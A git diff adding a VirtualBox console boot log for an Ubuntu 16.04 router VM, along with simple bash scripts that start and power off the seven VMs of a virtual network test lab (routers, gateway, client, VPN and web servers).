Loading essential drivers ... [ 9.856101] md: linear personality registered for level -1 +[ 9.881795] md: multipath personality registered for level -4 +[ 9.909534] md: raid0 personality registered for level 0 +[ 9.939832] md: raid1 personality registered for level 1 +[ 10.033279] raid6: sse2x1 gen() 7248 MB/s +[ 10.101537] raid6: sse2x1 xor() 5652 MB/s +[ 10.181633] raid6: sse2x2 gen() 10162 MB/s +[ 10.257606] raid6: sse2x2 xor() 7148 MB/s +[ 10.374160] raid6: sse2x4 gen() 6331 MB/s +[ 10.453660] raid6: sse2x4 xor() 3059 MB/s +[ 10.521711] raid6: avx2x1 gen() 12043 MB/s +[ 10.609745] raid6: avx2x2 gen() 14404 MB/s +[ 10.677670] raid6: avx2x4 gen() 14940 MB/s +[ 10.682351] raid6: using algorithm avx2x4 gen() 14940 MB/s +[ 10.706372] raid6: using avx2x2 recovery algorithm +[ 10.722623] xor: automatically using best checksumming function: +[ 10.778959] avx : 15586.000 MB/sec +[ 10.808989] async_tx: api initialized (async) +[ 10.913738] md: raid6 personality registered for level 6 +[ 10.917294] md: raid5 personality registered for level 5 +[ 10.919810] md: raid4 personality registered for level 4 +[ 10.971521] md: raid10 personality registered for level 10 +done. +Begin: Running /scripts/init-premount ... done. +Begin: Mounting root file system ... Begin: Running /scripts/local-top ... done. +Begin: Running /scripts/local-premount ... [ 11.154926] Btrfs loaded +Scanning for Btrfs filesystems +done. +Warning: fsck not present, so skipping root file system +[ 11.251414] EXT4-fs (sda1): INFO: recovery required on readonly filesystem +[ 11.255357] EXT4-fs (sda1): write access will be enabled during recovery +[ 11.296705] EXT4-fs (sda1): recovery complete +[ 11.307423] EXT4-fs (sda1): mounted filesystem with ordered data mode. Opts: (null) +done. +Begin: Running /scripts/local-bottom ... done. +Begin: Running /scripts/init-bottom ... done. +[ 11.638653] systemd[1]: systemd 229 running in system mode. (+PAM +AUDIT +SELINUX +IMA +APPARMOR +SMACK +SYSVINIT +UTMP +LIBCRYPTSETUP +GCRYPT +GNUTLS +ACL +XZ -LZ4 +SECCOMP +BLKID +ELFUTILS +KMOD -IDN) +[ 11.653630] systemd[1]: Detected virtualization oracle. +[ 11.672725] systemd[1]: Detected architecture x86-64. + +Welcome to Ubuntu 16.04.7 LTS! + +[ 11.697732] systemd[1]: Set hostname to . +[ 11.983572] random: nonblocking pool is initialized +[ 12.107560] systemd[1]: Listening on LVM2 poll daemon socket. +[ OK ] Listening on LVM2 poll daemon socket. +[ 12.150801] systemd[1]: Reached target Swap. +[ OK ] Reached target Swap. +[ 12.189894] systemd[1]: Created slice User and Session Slice. +[ OK ] Created slice User and Session Slice. +[ 12.195207] systemd[1]: Listening on udev Control Socket. +[ OK ] Listening on udev Control Socket. +[ 12.239799] systemd[1]: Listening on LVM2 metadata daemon socket. +[ OK ] Listening on LVM2 metadata daemon socket. +[ 12.280694] systemd[1]: Reached target User and Group Name Lookups. +[ OK ] Reached target User and Group Name Lookups. +[ 12.324079] systemd[1]: Created slice System Slice. +[ OK ] Created slice System Slice. +[ 12.343245] systemd[1]: Reached target System Time Synchronized. +[ OK ] Reached target System Time Synchronized. +[ 12.373838] systemd[1]: Created slice system-serial\x2dgetty.slice. +[ OK ] Created slice system-serial\x2dgetty.slice. +[ 12.465546] systemd[1]: Set up automount Arbitrary Executable File Formats File System Automount Point. +[ OK ] Set up automount Arbitrary Executab...ats File System Automount Point. +[ 12.471963] systemd[1]: Reached target Encrypted Volumes. +[ OK ] Reached target Encrypted Volumes. +[ 12.512954] systemd[1]: Listening on Journal Audit Socket. +[ OK ] Listening on Journal Audit Socket. +[ 12.549459] systemd[1]: Listening on Journal Socket. +[ OK ] Listening on Journal Socket. +[ 12.581353] systemd[1]: Starting Nameserver information manager... + Starting Nameserver information manager... +[ 12.609504] systemd[1]: Starting Create list of required static device nodes for the current kernel... + Starting Create list of required st... nodes for the current kernel... +[ 12.661361] systemd[1]: Mounting POSIX Message Queue File System... + Mounting POSIX Message Queue File System... +[ 12.705449] systemd[1]: Starting Uncomplicated firewall... + Starting Uncomplicated firewall... +[ 12.793345] systemd[1]: Mounting Huge Pages File System... + Mounting Huge Pages File System... +[ 12.849436] systemd[1]: Starting Remount Root and Kernel File Systems... +[ 12.859219] EXT4-fs (sda1): re-mounted. Opts: (null) + Starting Remount Root and Kernel File Systems... +[ 12.964610] systemd[1]: Listening on /dev/initctl Compatibility Named Pipe. +[ OK ] Listening on /dev/initctl Compatibility Named Pipe. +[ 12.996278] systemd[1]: Listening on Device-mapper event daemon FIFOs. +[ OK ] Listening on Device-mapper event daemon FIFOs. +[ 13.043153] systemd[1]: Starting Set console keymap... + Starting Set console keymap... +[ 13.059298] systemd[1]: Listening on Journal Socket (/dev/log). +[ OK ] Listening on Journal Socket (/dev/log). +[ 13.141326] systemd[1]: Mounting Debug File System... + Mounting Debug File System... +[ 13.197988] systemd[1]: Starting Monitoring of LVM2 mirrors, snapshots etc. using dmeventd or progress polling... + Starting Monitoring of LVM2 mirrors... dmeventd or progress polling... +[ 13.238803] systemd[1]: Started Trigger resolvconf update for networkd DNS. +[ OK ] Started Trigger resolvconf update for networkd DNS. +[ 13.277553] systemd[1]: Listening on Syslog Socket. +[ OK ] Listening on Syslog Socket. +[ 13.321451] systemd[1]: Listening on udev Kernel Socket. +[ OK ] Listening on udev Kernel Socket. +[ 13.413436] systemd[1]: Starting Load Kernel Modules... + Starting Load Kernel Modules... +[ 13.432529] systemd[1]: Started Forward Password Requests to Wall Directory Watch. +[ OK [[ 13.455009] Loading iSCSI transport class v2.0-870. +0m] Started Forward Password Requests to Wall Directory Watch. +[ 13.502488] systemd[1]: Starting Journal Service... + Starting Journal Service... +[ 13.564601] systemd[1]: Reached target Slices. +[ 13.585816] iscsi: regisred transport (tcp) + +[ OK ] Reached target Slices. +[ 13.858967] systemd[1]: Mounted Debug File System. +[ OK ] Mounted Debug File System. +[ 13.882835] systemd[1]: Mounted Huge Pages File System. +[ OK ] Mounted Huge Pages File System. +[ 13.962334] systemd[1]: Mounted POSIX Message Queue File System. +[ OK ] Mounted POSIX Message Queue File System. +[ 14.003931] systemd[1]: Started Journal Service. +[ OK ] Started Journal Service. +[ 14.085969] iscsi: registered transport (iser) +[ OK ] Started Create list of required sta...ce nodes for the current kernel. +[ OK ] Started Uncomplicated firewall. +[ OK ] Started Remount Root and Kernel File Systems. +[ OK ] Started Set console keymap. +[ OK ] Started Load Kernel Modules. +[ OK ] Started Nameserver information manager. +[ OK ] Started LVM2 metadata daemon. + Starting Apply Kernel Variables... + Mounting FUSE Control File System... + Starting Load/Save Random Seed... + Starting udev Coldplug all Devices... + Starting Create Static Device Nodes in /dev... + Starting Flush Journal to Persistent Storage... +[ OK ] Mounted FUSE Control File System. +[ OK ] Started Apply Kernel Variables. +[ OK ] Started Load/Save Random Seed. +[ OK ] Started Create Static Device Nodes in /dev. + Starting udev Kernel Device Manager... +[ OK ] Started udev Coldplug all Devices. +[ OK ] Started udev Kernel Device Manager. +[ OK ] Started Flush Journal to Persistent Storage. +[ OK ] Started Monitoring of LVM2 mirrors,...ng dmeventd or progress polling. +[ OK ] Reached target Local File Systems (Pre). +[ OK ] Reached target Local File Systems. + Starting Set console font and keymap... + Starting Tell Plymouth To Write Out Runtime Data... + Starting Initial cloud-init job (pre-networking)... + Starting LSB: AppArmor initialization... + Starting Create Volatile Files and Directories... +[ OK ] Started Dispatch Password Requests to Console Directory Watch. +[ OK ] Started Tell Plymouth To Write Out Runtime Data. +[ OK ] Started Create Volatile Files and Directories. + Starting Update UTMP about System Boot/Shutdown... +[ OK ] Started Update UTMP about System Boot/Shutdown. +[ OK ] Found device /dev/ttyS0. +[ OK ] Started LSB: AppArmor initialization. +[ OK ] Listening on Load/Save RF Kill Switch Status /dev/rfkill Watch. + Starting Load AppArmor profiles managed internally by snapd... +[ OK ] Started Set console font and keymap. +[ OK ] Started Load AppArmor profiles managed internally by snapd. +[ OK ] Found device 82540EM Gigabit Ethern...r (PRO/1000 MT Desktop Adapter). +[ OK ] Found device 82540EM Gigabit Ethern...r (PRO/1000 MT Desktop Adapter). +[ OK ] Found device 82540EM Gigabit Ethern...r (PRO/1000 MT Desktop Adapter). +[ OK ] Created slice system-getty.slice. +[ 19.540070] cloud-init[498]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 running 'init-local' at Mon, 25 Jan 2021 22:38:30 +0000. Up 18.27 seconds. +[ OK ] Started Initial cloud-init job (pre-networking). +[ OK ] Reached target Network (Pre). +[ OK ] Started ifup for enp0s9. +[ OK ] Started ifup for enp0s8. + Starting Raise network interfaces... +[ OK ] Started ifup for enp0s10. +[ OK ] Started ifup for enp0s3. +[ OK ] Started Raise network interfaces. + Starting Initial cloud-init job (metadata service crawler)... +[ OK ] Reached target Network. +[ 22.456521] cloud-init[1316]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 running 'init' at Mon, 25 Jan 2021 22:38:33 +0000. Up 21.61 seconds. +[ 22.462634] cloud-init[1316]: ci-info: +++++++++++++++++++++++++++++++++++++++Net device info+++++++++++++++++++++++++++++++++++++++ +[ 22.482373] cloud-init[1316]: ci-info: +---------+------+-----------------------------+---------------+--------+-------------------+ +[ 22.494461] cloud-init[1316]: ci-info: | Device | Up | Address | Mask | Scope | Hw-Address | +[ 22.508071] cloud-init[1316]: ci-info: +---------+------+-----------------------------+---------------+--------+-------------------+ +[ 22.519231] cloud-init[1316]: ci-info: | enp0s10 | True | 192.168.102.1 | 255.255.255.0 | global | 08:00:27:55:78:35 | +[ 22.529599] cloud-init[1316]: ci-info: | enp0s10 | True | fe80::a00:27ff:fe55:7835/64 | . | link | 08:00:27:55:78:35 | +[ 22.540849] cloud-init[1316]: ci-info: | enp0s3 | True | 10.0.2.15 | 255.255.255.0 | global | 02:83:3c:85:18:ff | +[ 22.549658] cloud-init[1316]: ci-info: | enp0s3 | True | fe80::83:3cff:fe85:18ff/64 | . | link | 02:83:3c:85:18:ff | +[ 22.558138] cloud-init[1316]: ci-info: | enp0s8 | True | 192.168.3.254 | 255.255.255.0 | global | 08:00:27:24:a8:61 | +[ 22.566470] cloud-init[1316]: ci-info: | enp0s8 | True | fe80::a00:27ff:fe24:a861/64 | . | link | 08:00:27:24:a8:61 | +[ 22.575267] cloud-init[1316]: ci-info: | enp0s9 | True | 192.168.101.1 | 255.255.255.0 | global | 08:00:27:53:ea:3b | +[ 22.584492] cloud-init[1316]: ci-info: | enp0s9 | True | fe80::a00:27ff:fe53:ea3b/64 | . | link | 08:00:27:53:ea:3b | +[ 22.593873] cloud-init[1316]: ci-info: | lo | True | 127.0.0.1 | 255.0.0.0 | host | . | +[ 22.601859] cloud-init[1316]: ci-info: | lo | True | ::1/128 | . | host | . | +[ 22.611496] cloud-init[1316]: ci-info: +---------+------+-----------------------------+---------------+--------+-------------------+ +[ 22.628526] cloud-init[1316]: ci-info: ++++++++++++++++++++++++++++Route IPv4 info+++++++++++++++++++++++++++++ +[ 22.633200] cloud-init[1316]: ci-info: +-------+---------------+----------+---------------+-----------+-------+ +[ OK ] Started Initial cloud-init job (metadata service crawler). +[ 22.649317] [cloud-init OK [1316]: ] ci-info: | Route | Destination | Gateway | Genmask | Interface | Flags |Reached target System Initialization. + +[ 22.731339] [cloud-init OK [1316]: ] ci-info: +-------+---------------+----------+---------------+-----------+-------+Started Daily Cleanup of Temporary Directories. + +[ OK ] Listening on ACPID Listen Socket. + Starting Socket activation for snappy daemon. +[ 22.731847] cloud-init[1316]: ci-info: | 0 | 0.0.0.0 | 10.0.2.2 | 0.0.0.0 | enp0s3 | UG | +[ 22.771435] [ OK ] Started Message of the Day. +cloud-init[1316]: [ OK ] Started Daily apt download activities. +[ OK ] Started Daily apt upgrade and clean activities. +ci-info: | 1 | 10.0.2.0 | 0.0.0.0 | 255.255.255.0 | enp0s3 | U | +[ 22.835659] cloud-init[1316]: ci-info: | 2 | 192.168.3.0 | 0.0.0.0 | 255.255.255.0 | enp0s8 | U | +[ 22.859517] cloud-init[1316]: ci-info: | 3 | 192.168.101.0 | 0.0.0.0 | 255.255.255.0 | enp0s9 | U | +[ 22.865113] cloud-init[1316]: ci-info: | 4 | 192.168.102.0 | 0.0.0.0 | 255.255.255.0 | enp0s10 | U | +[ 22.865192] cloud-init[1316]: ci-info: +-------+---------------+----------+---------------+-----------+-------+ +[ 22.865252] cloud-init[1316]: ci-info: +++++++++++++++++++Route IPv6 info+++++++++++++++++++ +[ 22.865312] cloud-init[1316]: ci-info: +-------+-------------+---------+-----------+-------+ +[ 22.865370] cloud-init[1316]: ci-info: | Route | Destination | Gateway | Interface | Flags | +[ 22.865429] cloud-init[1316]: ci-info: +-------+-------------+---------+-----------+-------+ +[ 22.865500] cloud-init[1316]: ci-info: | 0 | fe80::/64 | :: | enp0s9 | U | +[ 22.865563] cloud-init[1316]: ci-info: | 1 | fe80::/64 | :: | enp0s8 | U | + Starting LXD - unix socket. +[ OK ] Listening on D-Bus System Message Bus Socket. +[ 22.865751] cloud-init[1316]: ci-info: | 2 | fe80::/64 | :: | enp0s10 | U | +[ 23.180624] [ OK ] Started ACPI Events Check. +[ OK ] Reached target Paths. +[ OK ] Listening on UUID daemon activation socket. +[ OK ] Reached target Timers. +[ OK ] cloud-initReached target Cloud-config availability.[1316]: +ci-info: | 3 | fe80::/64 | :: | enp0s3 | U | +[ 23.333003] [cloud-init OK [1316]: ] ci-info: | 10 | ff00::/8 | :: | enp0s9 | U |Reached target Network is Online. + +[ 23.335013] cloud-init[1316]: ci-info: | 11 | ff00::/8 | :: | enp0s8 | U | +[ 23.432286] cloud-init[1316]: ci-info: | 12 | ff00::/8 | :: | enp0s10 | U | +[ 23.437100] cloud-init[1316]: ci-info: | 13 | ff00::/8 | :: | enp0s3 | U | +[ 23.445926] cloud-init[1316]: ci-info: +-------+-------------+---------+-----------+-------+ + Starting iSCSI initiator daemon (iscsid)... +[ OK ] Listening on Socket activation for snappy daemon. +[ OK ] Listening on LXD - unix socket. +[ OK ] Reached target Sockets. +[ OK ] Reached target Basic System. + Starting System Logging Service... +[ OK ] Started D-Bus System Message Bus. + Starting /etc/rc.local Compatibility... + Starting Accounts Service... + Starting LSB: Record successful boot for GRUB... +[ OK ] Started Deferred execution scheduler. + Starting Virtualbox guest utils... +[ OK ] Started FUSE filesystem for LXC. + Starting Login Service... + Starting OpenBSD Secure Shell server... + Starting LXD - container startup/shutdown... + Starting LSB: MD monitoring daemon... +[ OK ] Started Regular background program processing daemon. + Starting Snap Daemon... +[ OK ] Started ACPI event daemon. +[ OK ] Started System Logging Service. +[ OK ] Started iSCSI initiator daemon (iscsid). +[ OK ] Started /etc/rc.local Compatibility. +[ OK ] Started LXD - container startup/shutdown. +[ OK ] Started OpenBSD Secure Shell server. + Starting Authenticate and Authorize Users to Run Privileged Tasks... + Starting Login to default iSCSI targets... +[ OK ] Started LSB: Record successful boot for GRUB. +[ OK ] Started LSB: MD monitoring daemon. +[ OK ] Started Virtualbox guest utils. +[ OK ] Started Login Service. +[ OK ] Started Authenticate and Authorize Users to Run Privileged Tasks. +[ OK ] Started Snap Daemon. +[ OK ] Started Accounts Service. + Starting Wait until snapd is fully seeded... +[ OK ] Started Unattended Upgrades Shutdown. +[ OK ] Started Wait until snapd is fully seeded. + Starting Apply the settings specified in cloud-config... +[ OK ] Started Login to default iSCSI targets. +[ OK ] Reached target Remote File Systems (Pre). +[ OK ] Reached target Remote File Systems. + Starting LSB: Set the CPU Frequency Scaling governor to "ondemand"... + Starting LSB: daemon to balance interrupts for SMP systems... + Starting Permit User Sessions... + Starting LSB: automatic crash report generation... + Starting LSB: start and stop the Quagga routing suite... +[ OK ] Started Permit User Sessions. + Starting Terminate Plymouth Boot Screen... + Starting Hold until boot process finishes up... +[ OK ] Started Hold until boot process finishes up. +[ OK ] Started Terminate Plymouth Boot Screen. + Starting Set console scheme... +[ OK ] Started Getty on tty1. +[ OK ] Started Serial Getty on ttyS0. +[ OK ] Reached target Login Prompts. +[ OK ] Started Set console scheme. +[ OK ] Started LSB: automatic crash report generation. +[ OK ] Started LSB: Set the CPU Frequency Scaling governor to "ondemand". +[ OK ] Started LSB: daemon to balance interrupts for SMP systems. +[ OK ] Started LSB: start and stop the Quagga routing suite. +[ OK ] Reached target Multi-User System. +[ OK ] Reached target Graphical Interface. + Starting Update UTMP about System Runlevel Changes... +[ OK ] Started Update UTMP about System Runlevel Changes. +[ 26.940278] cloud-init[1521]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 running 'modules:config' at Mon, 25 Jan 2021 22:38:38 +0000. Up 26.39 seconds. +[ OK ] Started Apply the settings specified in cloud-config. + Starting Execute cloud user/final scripts... +[ 28.300207] cloud-init[1615]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 running 'modules:final' at Mon, 25 Jan 2021 22:38:39 +0000. Up 27.96 seconds. +[ 28.330836] cloud-init[1615]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 finished at Mon, 25 Jan 2021 22:38:40 +0000. Datasource DataSourceNoCloud [seed=/dev/sdb][dsmode=net]. Up 28.28 seconds +[ OK ] Started Execute cloud user/final scripts. +[ OK ] Reached target Cloud-init target. + +Ubuntu 16.04.7 LTS router33 ttyS0 + +router33 login: \ No newline at end of file diff --git a/virtual-test-environment/start_all.sh b/virtual-test-environment/start_all.sh new file mode 100755 index 0000000..eae4acb --- /dev/null +++ b/virtual-test-environment/start_all.sh @@ -0,0 +1,87 @@ +#!/bin/bash +# + + + +BORDER="~~~~~~~~~~~~~~~~~~~~~~~~~~~" + +NUM_RUNNING=$(vboxmanage list runningvms | wc -l) +echo Number of running vms: $NUM_RUNNING + +if [ $NUM_RUNNING -eq 6 ] + then + echo Sike all 6 vms already running + else + echo Bringing up all the VMs.. + + printf "$BORDER Starting all 3 routers \n" + + printf "\n$BORDER Booting router 1 \n" + + cd routers/router1 + #vagrant resume + vboxmanage startvm vague-router1 --type headless + echo "$BORDER Finished booting router 1" + + + printf "\n$BORDER Booting router 2 \n" + + cd ../router2 + #vagrant resume + vboxmanage startvm vague-router2 --type headless + echo "$BORDER Finished booting router 2" + + + printf "\n$BORDER Booting router 3 \n" + + cd ../router3 + #vagrant resume + vboxmanage startvm vague-router3 --type headless + echo "$BORDER Finished booting router 3" + + printf "\n$BORDER Booting gateway \n" + + cd ../gateway + #vagrant resume + vboxmanage startvm vague-gateway --type headless + printf "$BORDER Finished booting gateway\n\n" + + cd ../.. + sleep 1 + + RUNNERS=$(vboxmanage list runningvms) + + echo "Current running VMs: $RUNNERS" + + + printf "\n\n$BORDER Booting the 3 edge nodes .. \n" + + printf "\n$BORDER Booting the client \n" + + cd edgers/client + #vagrant resume + vboxmanage startvm vague-client --type headless + echo "$BORDER Finished booting client.." + + + printf "\n$BORDER Booting the vpn server \n" + + cd ../vpn-server + #vagrant resume + vboxmanage startvm vague-vpn-server --type headless + + echo "$BORDER Finished booting vpn server.." + + + printf "\n$BORDER Booting the web server \n" + + cd ../web-server + vboxmanage startvm vague-web-server --type headless + + printf "\n\n$BORDER Checking current VM status..\n\n" + + RUNNERS=$(vboxmanage list runningvms) + + echo "Current running VMs: $RUNNERS" + +fi diff --git a/virtual-test-environment/stop_all.sh b/virtual-test-environment/stop_all.sh new file mode 100755 index 0000000..f86612b --- /dev/null +++ b/virtual-test-environment/stop_all.sh @@ -0,0 +1,37 @@ +#!/bin/bash +# + + +echo "Shutting down and deleting all vagrant vms.." + + +echo "Stopping router 1.." +cd routers/router1 +vboxmanage controlvm vague-router1 poweroff + +echo "Stopping router 2.." +cd ../router2 +vboxmanage controlvm vague-router2 poweroff + +echo "Stopping router 3.." +cd ../router3 +vboxmanage controlvm vague-router3 poweroff + + +echo "Stopping gateway.." +cd ../gateway +vboxmanage controlvm vague-gateway poweroff + +cd ../.. + +echo "Stopping client vm.." +cd edgers/client +vboxmanage controlvm vague-client poweroff + +echo "Stopping vpn server vm.." +cd ../vpn-server +vboxmanage controlvm vague-vpn-server poweroff + +echo "Stopping web server vm.." +cd ../web-server +vboxmanage controlvm vague-web-server poweroff diff --git a/virtual-test-environment/virt-lab/.gitignore b/virtual-test-environment/virt-lab/.gitignore new file mode 100644 index 0000000..c0480e4 --- /dev/null +++ b/virtual-test-environment/virt-lab/.gitignore @@ -0,0 +1,2 @@ +*console.log +*/.vagrant/*